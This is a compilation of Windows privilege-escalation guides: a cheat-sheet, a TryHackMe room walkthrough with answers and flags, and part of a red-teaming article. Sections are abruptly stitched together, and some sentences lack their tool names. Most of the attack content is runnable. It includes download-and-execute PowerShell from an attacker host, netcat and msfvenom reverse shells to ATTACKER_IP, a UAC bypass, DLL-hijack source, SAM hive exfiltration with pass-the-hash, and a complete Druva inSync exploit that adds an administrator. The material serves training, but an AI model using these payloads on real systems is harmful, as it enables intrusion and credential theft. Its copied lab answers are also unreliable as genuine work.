Local privilege escalation windows

After the Local Enumeration phase, you might have found some interesting things. This section explains how you exploit some findings to reach the Administrator on the current (local) computer.

Once this is successful, you should have enough permissions to do anything on the machine. The main goal is often using Post-Exploitation: Mimikatz to read cached credentials from a memory dump of the LSASS.exe process.

Many times the enumeration efforts result in some new credentials being found. See for tools that can spray credentials over systems quickly, to find which computer or user they belong to.

You can also start a local process as another user from CMD/PowerShell using the runas command. This will start a new window as that user after filling in the correct password:

runas /user:j0r1an powershell  # local
runas /user:corp\j0r1an powershell  # domain

The above only works in an RDP setting where you interactively type the password. For shells instead, you can use PowerShell to create a new process with your credentials:

$pass = ConvertTo-SecureString '$PASSWORD' -AsPlainText -Force
# 1. Local account
$c = New-Object System.Management.Automation.PSCredential("$USERNAME", $pass)
# 2. Domain account
$c = New-Object System.Management.Automation.PSCredential("$DOMAIN\$USERNAME", $pass)

Start-Process -Credential ($c) -NoNewWindow powershell "iex (New-Object Net.WebClient).DownloadString('http://$IP:8000/shell.ps1')"  # Run your payload here

Windows uses ‘privileges’ to determine what you can and can’t do. There are some uninteresting default privileges, but also some that give a lot of power. Check them with the whoami command:

PS C:\> whoami /priv

Privilege Name                Description                          State
============================= ==================================== ========
SeShutdownPrivilege           Shut down the system                 Disabled
Se​Chan​geNoti​fyPr​ivil​ege       Bypass traverse checking             Enabled
S​eUnd​ockP​rivil​ege             Remove computer from docking station Disabled
Se​Inc​rease​Wor​ki​ngSe​tPr​ivile​ge Increase a process working set       Disabled

From these the SeShutdownPrivilege is a little interesting, as it allows you to reboot the machine. Some exploits only trigger at the startup of a service for example, and a reboot can trigger this at will.

Local administrators will have all the permissions that exist, so they can do anything on the computer. Sometimes a middle ground is chosen to give low-privilege users some extra privilege, but this can backfire if they are powerful ones that can be abused.

This privilege allows you to impersonate other users like nt authority\system. This user can do anything, like dumping LSASS memory with Mimikatz. Exploits exist that abuse this to get a shell:

PS C:\> .\PrintSpoofer64.exe -i -c powershell.exe
[+] Found privilege: SeImpersonatePrivilege
[+] Named pipe listening...
[+] CreateProcessAsUser() OK
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows

PS C:\Windows\system32> whoami
whoami
nt authority\system

.\GodPotato-NET4.exe -cmd ".\shell.exe"

.\SharpEfsPotato.exe -p C:\Windows\Tasks\shell.exe

PS C:\> whoami /priv  # Some privileges are disabled

Privilege Name                Description                          State
============================= ==================================== ========
SeShutdownPrivilege           Shut down the system                 Disabled
SeChangeNotifyPrivilege       Bypass traverse checking             Enabled
SeUndockPrivilege             Remove computer from docking station Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set       Disabled

PS C:\> IEX(New-Object System.Net.WebClient).DownloadString('https://raw.githubusercontent.com/fashionproof/EnableAllTokenPrivs/master/EnableAllTokenPrivs.ps1');

PS C:\> whoami /priv  # Now everything is enabled

Privilege Name                Description                          State
============================= ==================================== ========
SeShutdownPrivilege           Shut down the system                 Enabled
SeChangeNotifyPrivilege       Bypass traverse checking             Enabled
SeUndockPrivilege             Remove computer from docking station Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set       Enabled

Using whoami /groups you can find if your user is in the BUILTIN\Administrators group, and if they are, you should be able to reach the Mandatory Label\High, which might be at Mandatory Label\Medium right now.

PS C:\> whoami /groups

GROUP INFORMATION
-----------------

Group Name                             Type             SID                                            Attributes
====================================== ================ ============================================== ==================================================
Everyone                               Well-known group S-1-1-0                                        Mandatory group, Enabled by default, Enabled group
BUILTIN\Administrators                 Alias            S-1-5-32-544                                   Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Desktop Users           Alias            S-1-5-32-555                                   Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                          Alias            S-1-5-32-545                                   Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\BATCH                     Well-known group S-1-5-3                                        Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON                          Well-known group S-1-2-1                                        Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users       Well-known group S-1-5-11                                       Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization         Well-known group S-1-5-15                                       Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account             Well-known group S-1-5-113                                      Mandatory group, Enabled by default, Enabled group
LOCAL                                  Well-known group S-1-2-0                                        Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication       Well-known group S-1-5-64-10                                    Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level Label            S-1-16-8192

An Administrator should be able to start a Mandatory Label\High process, but this usually involves a user pressing «Yes» on a GUI prompt, this is the User Account Control (UAC) at work.

C:\> sigcheck -m c:/windows/system32/msconfig.exe
...
<asmv3:application>
	<asmv3:windowsSettings xmlns="http://schemas.microsoft.com/SMI/2005/WindowsSettings">
		<dpiAware>true</dpiAware>
		<autoElevate>true</autoElevate>
	</asmv3:windowsSettings>
</asmv3:application>

Many different built-in programs have this property set, but not all are secure. Microsoft seems to not classify UAC bypasses as an issue, so this repository collects dozens of working methods:

When building is done, you should find the compiled binary in «Source\Akagi\output\x64\Release\Akagi64.exe».

This can now be executed on the target by choosing a technique, and a program to start in a new window with the elevated privileges:

.\Akagi64.exe 61 powershell.exe

PS C:\> whoami /groups
...
Mandatory Label\High Mandatory Level   Label            S-1-16-12288

Manual fodhelper.exe Payload

$key = "HKCU\Software\Classes\ms-settings\Shell\Open\command"
cmd /c "reg add $key /v `"DelegateExecute`" /d `"`" /f"
cmd /c "reg add $key /d `"C:\Windows\Tasks\payload.exe`" /f"

fodhelper.exe
sleep 1
reg delete $key /f

Programs in Windows have assembled code that they execute, but also often load libraries and call their code to prevent having every program include some basic functionality. Which libraries to load can be completely decided by the program, and they can even make their own custom libraries (DLLs). When the program is started, directories are searched for the library names in the following order:

1. Directory containing the .exe that started

5. Current working directory

6. Any directories in the system $env:path environment variable

7. Any directories in the user $env:path environment variable

While 2-5 are often pretty locked, the 6 and 7 variables might contain some interesting directories that you may write in. Check their paths in PowerShell like so:

PS C:\> [Environment]::GetEnvironmentVariable("Path", "User")
C:\Users\$USERNAME\AppData\Local\Microsoft\WindowsApps;
PS C:\> [Environment]::GetEnvironmentVariable("Path", "Machine")
C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\

Perhaps the most interesting of all of these is 1, the directory containing the executable. If we as the attacker can write in this directory, and the executable is run in a higher-privileged context, we can overwrite an existing DLL to run whatever we want. Check permissions using icacls or just try writing there with a simple echo a > a.

When having confirmed that a writable searched directory exists, we need to find what DLLs are loaded by the executable. A very unscientific way of doing this is simply searching for .dll names in the program binary after transferring it over to your Linux machine:

$ grep -Eao '\w+\.dll' Program.exe | sort -u
0.dll
MyLibrary.dll
VCRUNTIME140.dll
advapi32.dll
dbghelp.dll
kernel32.dll

Now that we have found a potential place and name for a DLL that we can overwrite, we have to create a malicious DLL that runs what we want, like a reverse shell also stored on the system. We just need to define the special DllMain() function and handle the different cases:

#include <stdlib.h>
#include <stdlib.h>
#include <windows.h>

BOOL APIENTRY DllMain(
    HANDLE hModule,           // Handle to DLL module
    DWORD ul_reason_for_call, // Reason for calling function
    LPVOID lpReserved)        // Reserved
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH: // A process is loading the DLL.
        system("C:\\Windows\\Tasks\\shell.exe");
        break;
    case DLL_THREAD_ATTACH: // A process is creating a new thread.
        break;
    case DLL_THREAD_DETACH: // A thread exits normally.
        break;
    case DLL_PROCESS_DETACH: // A process unloads the DLL.
        break;
    }
    return TRUE;
}

Then we can compile this code locally from a Linux machine by using the mingw compiler, to create a .dll shared library. This can be moved over to the vulnerable location on the target.

x86_64-w64-mingw32-gcc MyLibrary.cpp --shared -o MyLibrary.dll

Post-Exploitation: Mimikatz

Some commands require privilege::debug or even token::elevate to be run before, to activate the required privileges. Make sure to try these first when you encounter errors.

The sekurlsa::logonpasswords, lsadump::lsa and lsadump::sam commands go hand-in-hand, finding different plaintext credentials, NTLM hashes, or Kerberos tickets from logged-on users in memory for the first, and by asking the LSA server for the latter. These are incredibly useful for starting Lateral Movement.
sekurlsa::tickets is another such tool that finds active Kerberos tickets to export and import.

There are some tools that run the techniques Mimikatz uses from a remote perspective, which may be quicker to use. Here are a few of them:

python3 secretsdump.py $DOMAIN/$USERNAME:$PASSWORD@$IP

lsassy -u Administrator -H 2ffb2676507e81cb73211213ed643202 -d hackn.lab 10.10.10.0/30 --users

It’s possible that this exploit above does not work, but some alternatives might work in these scenarios. First, there is which you can download pre-compiled from the Releases, and execute:

Lastly, there is also which needs to be compiled by hand using :

In rare cases, privileges might be Disabled which doesn’t let you abuse them. Luckily for the attacker, this is only a setting that you can easily Enable for any privilege. The script can be used to enable all these privileges:

This feature is however bypassable without a GUI using AutoElevate programs. To check if a binary has the AutoElevate property, we can use :

To build the tool, open the Source folder in . This should open the «Akagi» project which you can build in Release mode for x64 architecture:

Any of these will probably work, but MyLibrary.dll seems custom and most likely, so we’ll focus on that. To find out what libraries are actually loaded we can dynamically analyze it by running it locally and attaching , then looking for CreateFile events with .dll extensions:

When having taken over a computer to full Administrator privileges, and the High Integrity Level, tools like can use these privileges to do a lot of nasty stuff. The tool is a big collection of commands that should be run on the target itself as an executable. Its most common use case is extracting in-memory credentials from the computer to use in further attacks, like cracking or passing them.

The command stands for «Pass The Hash», allowing you to spawn a process as another user only knowing their NTLM hash.

Remotely dump all kinds of secrets on the target computer, from NTLM hashes to SAM and LSA. While this finds and dumps a lot, it won’t find everything (read more in ).

It is time to look at the Windows Privilege Escalation Room on TryHackMe, a medium level room in which we learn how to escalate our privileges on Windows machine. I don’t know about you but I am looking forward to this one. I have historically been stronger on looking at Linux machine, so there is a bunch to learn.

Box URL: https://tryhackme.com/r/room/windowsprivesc20

I am making these walkthroughs to keep myself motivated to learn cyber security, and ensure that I remember the knowledge gained by these challenges on HTB and THM. Join me on learning cyber security. I will try and explain concepts as I go, to differentiate myself from other walkthroughs.

Task 1: Introduction

During a penetration test, you will often have access to some Windows hosts with an unprivileged user. Unprivileged users will hold limited access, including their files and folders only, and have no means to perform administrative tasks on the host, preventing you from having complete control over your target.

This room covers fundamental techniques that attackers can use to elevate privileges in a Windows environment, allowing you to use any initial unprivileged foothold on a host to escalate to an administrator account, where possible.

If you want to brush up on your skills first, you can have a look through the Windows Fundamentals Module or the Hacking Windows Module.

Questions

Click and continue learning!

Answer: No answer needed

Privilege escalation involves leveraging existing access to a system to gain higher privileges, often aiming for administrative control. This can be done by exploiting weaknesses such as misconfigurations, excessive privileges, vulnerable software, or missing security patches.

Windows users are categorized as:

• Administrators: Have full system control.
• Standard Users: Have limited access and cannot make major changes.

Additionally, special built-in accounts exist:

• SYSTEM: Higher privileges than administrators.
• Local Service: Runs services with minimal privileges.
• Network Service: Runs services using network authentication.

Exploiting these accounts can sometimes grant elevated access.

Questions

Users that can change system configurations are part of which group?

Answer: Administrators

The SYSTEM account has more privileges than the Administrator user (aye/nay)

The system account has full access to all files and resources available on the host with even higher privileges than administrators.

Answer: aye

Task 3: Harvesting Passwords from Usual Spots

The easiest way to escalate privileges is by gathering stored credentials from a compromised Windows machine. Common locations include:

1. Unattended Windows Installations

Administrators often leave credentials in configuration files used for automated installations:

• C:\Unattend.xml
• C:\Windows\Panther\Unattend.xml
• C:\Windows\system32\sysprep.inf

2. PowerShell History

PowerShell logs executed commands, including those containing passwords. Retrieve them via:

type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt

3. Saved Windows Credentials

Windows allows users to store credentials, which can be listed with:

Use stored credentials with:

runas /savecred /user:admin cmd.exe

4. IIS Configuration Files

Web server configurations may contain stored passwords in web.config:

• C:\inetpub\wwwroot\web.config
• C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config
  Search for database credentials:

type C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config | findstr connectionString

5. PuTTY Stored Credentials

PuTTY stores proxy credentials in the registry. Retrieve them with:

reg query HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions\ /f "Proxy" /s

Other software (browsers, FTP clients, email clients, etc.) may also store credentials that can be recovered.

Questions

A password for the julia.jones user has been left on the Powershell history. What is the password?

To read the Powershell history we enter the following command:

type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt

There on line 6 we find her password.

Answer: ZuperCkretPa5z

A web server is running on the remote host. Find any interesting password on web.config files associated with IIS. What is the password of the db_admin user?

According to the task, there are two possible locations where we can find these web.config files:

• C:\inetpub\wwwroot\web.config
• C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config

The first one does not exist on the system, but if we run the command with the second location we find a connectionString:

type C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config | findstr connectionString

To be exact, we find this, including the password:

<add connectionString=”Server=thm-db.local;Database=thm-sekure;User ID=db_admin;Password=098n0x35skjD3" name=”THM-DB” />

Answer: 098n0x35skjD3

There is a saved password on your Windows credentials. Using cmdkey and runas, spawn a shell for mike.katz and retrieve the flag from his desktop.

The instructions tell use exactly what to do. Start with cmdkey to see for which users we have saved credentials:

Sure enough, we have a saved credential for mike.

Now run the following command to run cmd with his credentials:

runas /savecred /user:mike.katz cmd.exe

There we go. Now find the flag on mike.katz’s Desktop:

Answer: THM{WHAT_IS_MY_PASSWORD}

Retrieve the saved password stored in the saved PuTTY session under your profile. What is the password for the thom.smith user?

This one is also literally described in the task. Run the following command to search under the following registry key for ProxyPassword:

reg query HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions\ /f "Proxy" /s

Cool pass, indeed!

Answer: CoolPass2021

Task 4: Other Quick Wins

This task is all about abusing Task Scheduler tasks that have been configured to run an executable file that we can change to run a netcat reverse shell.

Privilege escalation can be facilitated through misconfigurations, such as those found in scheduled tasks or Windows installer files. These techniques are often more relevant in Capture The Flag (CTF) events than real penetration testing engagements.

Scheduled Tasks:

1. Misconfigured Task: A scheduled task may run a binary you can modify. You can list tasks with schtasks /query and check the file permissions using icacls.
2. Privilege Escalation: If a scheduled task’s executable is accessible, modify it to execute a reverse shell. For example, replace the task’s binary with a command to spawn a reverse shell using nc64.exe.
3. Triggering the Task: Once the task is modified, use schtasks /run to manually execute it and get a reverse shell with the user privileges of the scheduled task.

AlwaysInstallElevated:

1. Windows Installer: MSI files can be set to run with elevated privileges if registry keys are configured. This allows unprivileged users to run an MSI that executes with administrator rights.
2. Registry Check: Use reg query to check if the necessary registry keys are set. If they are, generate a malicious MSI file using msfvenom and execute it with msiexec to get a reverse shell.

Both methods demonstrate how improper configurations can lead to privilege escalation by exploiting the ability to modify files or settings that execute with higher privileges.

Questions

What is the taskusr1 flag?

Let’s start by getting info on the scheduled task called “vulntask”.

schtasks /query /tn vulntask /fo list /v

As discussed in the task description, we can edit the file if have the correct permissions. To check these we run the following command:

icacls c:\tasks\schtask.bat

Now all we need to do is echo the nc64 command to the schtask.bat file to overwrite its content. Remember to change the ip.

echo c:\tools\nc64.exe -e cmd.exe ATTACKER_IP 4444 > C:\tasks\schtask.bat

And setup a listener on your attacker machine:

Finally, run the scheduled task with:

schtasks /run /tn vulntask

And yes, we got a connection:

And find the flag:

Answer: THM{TASK_COMPLETED}

Task 5: Abusing Service Misconfigurations

This part covers three different service misconfigurations, and each vulnerability has a question related to it.

Windows services are managed by the Service Control Manager (SCM), which controls service states and configurations. Each service has an associated executable and a user account it runs under. Services are configured in the Windows registry, and their executable path and associated account are specified there. Permissions for services are controlled via a Discretionary Access Control List (DACL), determining who can start, stop, or configure the service.

Insecure Permissions on Service Executables: If a service’s executable has weak permissions, attackers can replace it with malicious payloads, gaining privileges of the service’s account. An example using Splinterware System Scheduler showed how to exploit a service by overwriting its executable, causing the service to run malicious code.

Unquoted Service Paths: A vulnerability occurs when the service executable path is unquoted, allowing an attacker to insert their own executable before the intended one. If a service path has spaces but isn’t quoted, the SCM may misinterpret the command, potentially running an attacker’s executable instead. This can be exploited when services are installed in writable directories, allowing an attacker to place malicious executables in those locations.

Exploitation: In both scenarios, attackers create and place malicious executables on the target system, manipulate service configurations or permissions, and gain elevated access through service misconfigurations.

Questions

Get the flag on svcusr1’s desktop.

Once again, we can follow the steps from the covered theory:

The binary path is mentioned. Now we check the permissions:

icacls C:\PROGRA~2\SYSTEM~1\WService.exe

The Everyone group has modify permissions (M) on the service’s executable. This means we can simply overwrite it with any payload of our preference, and the service will execute it with the privileges of the configured user account.

Now we need to fulfil the following tasks:

1. Create a reverse shell payload:

msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=4445 -f exe-service -o rev-svc.exe

2. Setup a Python web server:

3. Get the binary from the attacker machine into the target

wget http://ATTACKER_IP:8000/rev-svc.exe -O rev-svc.exe

4. On the target machine, rename the original binary, move the payload to its location and give the right permissions (making sure you are using Powershell):

cd C:\PROGRA~2\SYSTEM~1\
C:\PROGRA~2\SYSTEM~1> move WService.exe WService.exe.bkp
move C:\Users\thm-unpriv\rev-svc.exe WService.exe
icacls WService.exe /grant Everyone:F

5. On your attacker machine, setup a reverse listener:

6. On the target machine, startup the task:

sc stop windowsscheduler
sc start windowsscheduler

7. Startup a listener and receiving a shell:

And there we can the flag:

Answer: THM{AT_YOUR_SERVICE}

Get the flag on svcusr2’s desktop.

Now it is time to abuse Unquoted Service Paths. The process is quite similar. We place a binary in a place that gets called due to a Task Scheduler task not correctly specifying its BINARY_PATH:NAME (not using double quotes), causing our payload to be called instead. Again , we need to build a payload with msfvenom, download it from our attacker machine, setup a listener, and start the scheduled task.

The problem is with the following task:

sc qc "disk sorter enterprise"

If we check the permissions on the binary file location we can see that we have writing privileges:

There we can do as follows on our machine:

# Create payload
msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=4446 -f exe-service -o rev-svc2.exe

And:

# Setup a server
python3 -m http.server

Then we download the file on our target machine:

wget http://ATTACKER_IP:8000/rev-svc2.exe -O rev-svc2.exe

Setup a listener on our attacker machine:

# Setup listener
nc -lvp 4446

Move the file and give it permissions:

move C:\Users\thm-unpriv\rev-svc2.exe C:\MyPrograms\Disk.exe
icacls C:\MyPrograms\Disk.exe /grant Everyone:F

And start and stop the task:

sc stop "disk sorter enterprise"
sc start "disk sorter enterprise"

And we got a reverse shell:

As before, find the flag on svcusr2’s desktop located at C:\Users\svcusr2\Desktop.

Answer: THM{QUOTES_EVERYWHERE}

Get the flag on the Administrator’s desktop.

You know the drill by now. It is very similar to the last two questions:

1. Create a payload:

msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=4447 -f exe-service -o rev-svc3.exe

2. Start a server:

3. Start a listener:

4. Download the file from Powershell:

wget http://10.10.121.104:8000/rev-svc3.exe -o rev-svc3.exe

5. Give it permissions:

icacls C:\Users\thm-unpriv\rev-svc3.exe /grant Everyone:F

6. In your cmd configure the binPath:

sc config THMService binPath= “C:\Users\thm-unpriv\rev-svc3.exe” obj= LocalSystem

7. Stop, and start the service:

sc stop THMService
sc start THMService

You should have received a reverse shell:

Now find the flag on the administrator’s desktop:

Answer: THM{INSECURE_SVC_CONFIG}

Task 6: Abusing dangerous privileges

1. Privileges Overview:

   • Privileges grant rights to perform system tasks like shutting down the system or bypassing access controls. Key privileges are of interest to attackers for escalating privileges.
   • The whoami /priv command shows the privileges of the current user.

2. SeBackup / SeRestore Privileges:

   • Description: These privileges allow bypassing DACLs to read/write any file, useful for backup operations.
   • Exploitation: Attackers can use these privileges to copy registry hives (SAM and SYSTEM) and extract password hashes. Tools like Impacket’s secretsdump can be used to retrieve the hashes and then perform Pass-the-Hash attacks to gain SYSTEM access.

3. SeTakeOwnership Privilege:

   • Description: Allows users to take ownership of any file or object on the system.
   • Exploitation: An attacker can use this privilege to replace system executables (like utilman.exe), giving themselves SYSTEM-level access. The process includes taking ownership of the file, granting full permissions, and replacing the executable with a payload.

4. SeImpersonate / SeAssignPrimaryToken Privileges:

   • Description: These privileges allow a process to impersonate another user, enabling it to act on their behalf.
   • Exploitation: Attackers can exploit these privileges by compromising services like IIS, which use accounts with impersonation privileges (e.g., LOCAL SERVICE, NETWORK SERVICE). Using tools like RogueWinRM, an attacker can spawn a process that impersonates a privileged user (e.g., SYSTEM) and execute commands remotely via a malicious connection.

These privileges represent common opportunities for attackers to escalate their privileges and gain more control over a compromised system.

Questions

Get the flag on the Administrator’s desktop.

In this task, we can decide between three different methods: SeBackup / SeRestore, SeTakeOwnership, SeImpersonate / SeAssignPrimaryToken. I will pick the Backup route as it seems to involve of a few techniques I find great to learn.

RDP into the target machine, for example by using Remmina on your AttackBox. When logged in you can go ahead and run a command prompt as administrator.

You should now be able to see your privileges with the command:

Bypass traverse checking allows to backup SAM and SYSTEM hashes with the following commands:

reg save hklm\system C:\Users\THMBackup\system.hive
reg save hklm\sam C:\Users\THMBackup\sam.hive

Make sure the backups are in the directory:

Now we need to get it over to your AttackBox. We can do by using SMB. We can use impacket’s smbserver.py to start a simple SMB server with a network share in the current directory of our AttackBox.

Run the following commands:

mkdir share
python3.9 /opt/impacket/examples/smbserver.py -smb2support -username THMBackup -password CopyMaster555 public share

Tip: I had problems with impacket warning me that the address already was in use. In this case run the following commands and try again:

sudo lsof -i :445
# If this command shows a process using port 445 (the default SMB port), note its PID.
sudo kill -9 <PID>

Now run the following commands to copy the backups to your attacker machine.

copy C:\Users\THMBackup\sam.hive \\ATTACKER_IP\public\
copy C:\Users\THMBackup\system.hive \\ATTACKER_IP\public\

We can now use impacket to retrieve the users’ password hashes:

cd share
python3.9 /opt/impacket/examples/secretsdump.py -sam sam.hive -system system.hive LOCAL

Finally, we can do a Pass-the-Hash attack by passing the Administrator hash in the following command (please use the correct hash if it does not fit your results):

python3.9 /opt/impacket/examples/psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:13a04cdcf3f7ec41264e568127c5ca94 administrator@10.10.1.125

Now we only need to find the flag on the Administrator’s Desktop:

There we go!

Answer: THM{SEFLAGPRIVILEGE}

Task 7: Abusing vulnerable software

Unpatched Software and Privilege Escalation

• Software installed on a target system can present opportunities for privilege escalation, especially if it is outdated. Users often neglect updates for software, making it a potential target.
• You can use the wmiccommand to list installed software and versions (wmic product get name,version,vendor), although not all programs may show up. It’s important to check other traces of software, like shortcuts or services.
• Once you gather the software’s version, online resources (e.g., exploit-db, Google) can be used to find known vulnerabilities for any installed products.

Case Study: Druva inSync 6.6.3

• Vulnerability: The target system runs Druva inSync 6.6.3, which has a privilege escalation vulnerability related to an RPC server running on port 6064 with SYSTEM privileges, only accessible from localhost. The vulnerability stems from a flawed patch after an earlier issue with version 6.5.0.
• Cause: Procedure 5 in the RPC service allows arbitrary command execution. While a patch was issued to restrict commands to a specific path (C:\ProgramData\Druva\inSync4\), a path traversal attack could bypass this restriction, allowing execution of arbitrary commands (e.g., C:\Windows\System32\cmd.exe).

Exploit:

• The exploit involves sending packets to the RPC service to execute a command. A PowerShell script is provided that connects to the vulnerable service and sends a crafted request to execute commands with SYSTEM privileges.
• The default payload adds a user (pwnd) without administrative rights, but the script can be modified to elevate the user to an administrator by running the following commands: net user pwnd SimplePass123 /add net localgroup administrators pwnd /add
• After executing the exploit, the new user can run commands with administrative privileges and retrieve the flag from the Administrator’s desktop.

The final practical task to complete in this room, and it’s a short one. Let’s go. We are in the endgame now.

Questions

Get the flag on the Administrator’s desktop.

The theory mentions the following exploit:

$ErrorActionPreference = "Stop"

$cmd = "net user pwnd SimplePass123 /add & net localgroup administrators pwnd /add"

$s = New-Object System.Net.Sockets.Socket(
    [System.Net.Sockets.AddressFamily]::InterNetwork,
    [System.Net.Sockets.SocketType]::Stream,
    [System.Net.Sockets.ProtocolType]::Tcp
)
$s.Connect("127.0.0.1", 6064)

$header = [System.Text.Encoding]::UTF8.GetBytes("inSync PHC RPCW[v0002]")
$rpcType = [System.Text.Encoding]::UTF8.GetBytes("$([char]0x0005)`0`0`0")
$command = [System.Text.Encoding]::Unicode.GetBytes("C:\ProgramData\Druva\inSync4\..\..\..\Windows\System32\cmd.exe /c $cmd");
$length = [System.BitConverter]::GetBytes($command.Length);

$s.Send($header)
$s.Send($rpcType)
$s.Send($length)
$s.Send($command)

All we need to do is run this exploit on the target machine in a Powershell console.

The exploit will create user pwnd with a password of SimplePass123 and add it to the administrators’ group. If the exploit was successful, we should be able to run the following command to verify that the user exists and is part of the administrators’ group:

This is the case. Now we can run a command prompt as administrator. When prompted for credentials, use the pwnd account.

From the new command prompt, you can retrieve your flag from the Administrator’s desktop with the following command:

type C:\Users\Administrator\Desktop\flag.txt

There we have it 🙂

Answer: THM{EZ_DLL_PROXY_4ME}

System Enumeration Tools for Privilege Escalation

• Automated Tools: Several scripts are available to streamline the system enumeration process and identify potential privilege escalation vectors. However, these tools may miss some escalation paths, so manual checks are still important.

Common Tools for Privilege Escalation:

1. WinPEAS

   • Purpose: A script designed to enumerate the target system and uncover privilege escalation opportunities.
   • How it works: Runs commands similar to those discussed in previous tasks and displays their output.
   • Usage: It’s recommended to redirect the output to a file for easier review, as it can be extensive.
   • Download: Available as a precompiled executable or a .bat script.

2. PrivescCheck

   • Purpose: A PowerShell script that checks for common privilege escalation opportunities on the target system without needing a binary file.
   • How it works: Run the script with PowerShell by bypassing execution policy restrictions using the Set-ExecutionPolicy cmdlet.
   • Usage: The script can be executed with Invoke-PrivescCheck after setting the execution policy to bypass.

3. WES-NG (Windows Exploit Suggester – Next Generation)

   • Purpose: A Python script that helps suggest exploits based on missing patches and vulnerabilities that can be exploited for privilege escalation.
   • How it works: Runs on the attacking machine (e.g., Kali Linux), requiring system information from the target system via the systeminfo command. The script then compares the data with a database of known vulnerabilities.
   • Usage: After updating the database (wes.py --update), run the script with the systeminfo.txt file generated from the target system.

4. Metasploit

   • Purpose: If you have a Meterpreter shell on the target system, the multi/recon/local_exploit_suggester module can be used to find local vulnerabilities that could lead to privilege escalation.

Questions

Click and continue learning!

Answer: No answer needed.

Task 9: Conclusion

In this room, we have introduced several privilege escalation techniques available in Windows systems. These techniques should provide you with a solid background on the most common paths attackers can take to elevate privileges on a system. Should you be interested in learning about additional techniques, the following resources are available:

• PayloadsAllTheThings – Windows Privilege Escalation
• Priv2Admin – Abusing Windows Privileges
• RogueWinRM Exploit
• Potatoes
• Decoder’s Blog
• Token Kidnapping
• Hacktricks – Windows Local Privilege Escalation

Questions

Click and continue learning!

Answer: No answer needed.

We are done!

Congratulations, we are done! I hope you enjoyed this walkthrough on the TryHackMe: Windows Privilege Escalation room.

Like my articles?

You are welcome to share this article with your friends 🙂
I would be even more grateful if you support me by buying me a cup of coffee:

I learned a lot through HackTheBox’s Academy. If you want to sign up, you can get extra cubes, and support me in the process, if you use the following link:

https://referral.hackthebox.com/mzwwXlg

Картинка с сайта: 0xstarlight.github.io

Introduction

Welcome to my third article in the Red Teaming Series (Active Directory Local Privilege Escalation). I hope everyone has gone through the first two articles of this series which go through the basic concepts required to understand Active Directory and high-level Domain enumeration explanation.

If not so, you can give it a read from here.

This guide aims to explain Windows/Active-Directory Local Privilege escalation snippets mainly by abusing services, registries, tokens and groups etc., in detail. I will also explain those terms that every pentester/red-teamer should control to understand the attacks performed in an Active Directory network. You may refer to this as a Cheat-Sheet also.

I will continue to update this article with new privilege escalation vectors.

Throughout the article, I will use PowerView, winPEAS, AccessChk and PowerUp in performing local privilege escalation on an Windows/Active Directory Environment. If any other tools are required, they will be mentioned along.

What is Privilege Escalation

Privilege escalation exploits a bug, a design flaw, or a configuration oversight in an operating system or software application to gain elevated access to resources that are generally protected from an application or user. Now that you know the meaning of privilege escalation, we can dive right into the techniques for escalation.

Autorun

Methodology

Autorun is a type of Registry Escalation.

To ensure that the IT department creates a secure environment, Windows administrators often need to know what kind of access specific users or groups have to resources, including files, directories, Registry keys, global objects, and Windows services. AccessChk quickly answers these questions with an intuitive interface and output.

So basically, we can say a particular application in a specific directory gets automatically executed with administrator privileges once he logs on. This can be abused by finding the path location and dropping our malicious executable file through which we will gain administrator access.

Detection

Using Autoruns and AccessChk

1. Transfer Autoruns64.exe on the Windows/AD machine and execute it on cmd

   1	C:\Temp> Autoruns64.exe

   

   Картинка с сайта: 0xstarlight.github.io

2. In Autoruns, click on the "Logon" tab.
3. From the listed results, notice that the "My Program" entry is pointing to "C:\Program Files\Autorun Program\program.exe".
4. Go back to the command prompt run AccessChk64.exe

1
2
3
4
5
6

C:\Temp> accesschk64.exe -wvu "C:\Program Files\Autorun Program"

# Switch meaning
# w --> only show items that have write access
# v --> verbose; dispaly as many details as possible
# u --> ignore the errors

Картинка с сайта: 0xstarlight.github.io

Using PowerUp

1. Run PowerUp and Run Invoke-AllChecks (check the autoruns field)

1
2
3

C:\Temp> powershell -ep bypass
PS C:\Temp>. .\PowerUp.sp1
PS C:\Temp> Invoke-AllChecks

Картинка с сайта: 0xstarlight.github.io

From the output, notice that the "Everyone" user group has "FILE_ALL_ACCESS" permission on the "program.exe" file. To gain administrator access, we can drop our malicious executable file by overwriting on the file.

Exploitation

Kali VM

1. Start a netcat listener
2. Open an additional command prompt and type:

   1	$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=[tun0 IP] LPORT=53 -f exe -o program.exe

3. Transfer the generated file, program.exe, to the Windows VM.

Windows VM

1. replace program.exe in 'C:\Program Files\Autorun Program'

Kali VM

1. Wait for a reverse shell on your kali machine.

AlwaysInstallElevated

Methodology

AlwaysInstallElevated is a type of Registry Escalation.

This option is equivalent to granting full administrative rights, which can pose a massive security risk. Microsoft strongly discourages the use of this setting.

